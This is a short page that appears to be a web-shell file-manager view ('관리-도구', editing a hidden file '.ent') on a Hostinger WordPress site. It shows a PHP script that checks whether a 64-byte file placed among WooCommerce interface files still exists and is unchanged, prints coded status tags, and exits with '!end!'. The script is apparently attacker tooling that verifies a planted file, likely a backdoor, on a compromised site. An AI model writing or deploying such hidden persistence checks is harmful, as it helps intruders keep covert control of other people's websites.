관리-도구
편집 파일: .ent
<?php $r = '/home/u654838742/domains/lavenderblush-rabbit-792694.hostingersite.com/public_html'; $x = ["/wp-content/plugins/woocommerce/includes/interfaces/class-wc-order-item-data-store-interface.php"=>"bd@@163194@@64"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');